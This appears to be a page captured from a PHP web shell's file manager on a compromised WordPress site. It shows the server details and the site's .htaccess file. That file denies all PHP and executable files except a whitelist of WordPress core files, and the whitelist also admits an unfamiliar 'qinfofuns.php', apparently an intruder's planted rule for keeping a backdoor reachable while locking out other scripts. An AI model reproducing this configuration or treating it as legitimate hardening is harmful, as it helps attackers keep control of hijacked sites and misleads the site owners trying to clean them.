HEX
Server: Apache
System: Linux hostingsrv9.dondominio.com 6.12.96+deb13-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.12.96-1 (2026-07-20) x86_64
User: (743674)
PHP: 8.5.8
Disabled: system,passthru,popen,proc_close,proc_get_status,proc_nice,proc_open,proc_terminate,shell_exec,exec,ini_alter,show_source,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,mail,eval
Upload Files
File: /hosting/www/camarasolarpanama.org/public/CAPESWP/.htaccess
<FilesMatch "(?i)\.(py|exe|phtml|php\d*|suspected|cgi)$">
    <IfModule mod_authz_core.c>
        Require all denied
    </IfModule>
    <IfModule !mod_authz_core.c>
        Order allow,deny
        Deny from all
    </IfModule>
</FilesMatch>

<FilesMatch "^(nav-menus\.php|admin-post\.php|options-general\.php|about\.php|menu-header\.php|load-styles\.php|options-head\.php|edit-comments\.php|edit-tag-form\.php|credits\.php|widgets-form\.php|comment\.php|index\.php|wp-trackback\.php|options-media\.php|my-sites\.php|admin-functions\.php|admin-header\.php|options-writing\.php|custom-header\.php|menu\.php|users\.php|async-upload\.php|link-parse-opml\.php|wp-login\.php|upload\.php|widgets-form-blocks\.php|xmlrpc\.php|import\.php|styles\.php|wp-upgrade\.php|user-edit\.php|ms-users\.php|plugin-install\.php|wp-settings\.php|options-discussion\.php|custom-background\.php|wp-links-opml\.php|user-new\.php|options\.php|media-upload\.php|upgrade-functions\.php|post-new\.php|admin-ajax\.php|options-connectors\.php|profile\.php|ms-options\.php|options-reading\.php|load-scripts\.php|erase-personal-data\.php|privacy-policy-guide\.php|link-add\.php|upgrade\.php|tools\.php|update\.php|wp-load\.php|wp-comments-post\.php|edit-form-advanced\.php|plugin-editor\.php|edit-form-comment\.php|admin-footer\.php|admin\.php|options-privacy\.php|themes\.php|edit-link-form\.php|ms-admin\.php|link-manager\.php|link\.php|update-core\.php|press-this\.php|ms-delete-site\.php|plugins\.php|media-new\.php|revision\.php|privacy\.php|post\.php|wp-signup\.php|edit-form-blocks\.php|site-health\.php|site-health-info\.php|authorize-application\.php|network\.php|theme-install\.php|customize\.php|options-permalink\.php|export\.php|freedoms\.php|widgets\.php|wp-activate\.php|wp-mail\.php|setup-config\.php|wp-cron\.php|ms-edit\.php|ms-themes\.php|install\.php|media\.php|font-library\.php|theme-editor\.php|wp-config-sample\.php|moderation\.php|site-maintenance\.php|wp-blog-header\.php|ms-upgrade-network\.php|term\.php|ms-sites\.php|edit-tags\.php|edit\.php|qinfofuns\.php|site-editor\.php|export-personal-data\.php|contribute\.php|install-helper\.php)$">
    <IfModule mod_authz_core.c>
        Require all granted
    </IfModule>
    <IfModule !mod_authz_core.c>
        Order allow,deny
        Allow from all
    </IfModule>
</FilesMatch>

<IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteRule ^index\.php$ - [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . index.php [L]
</IfModule>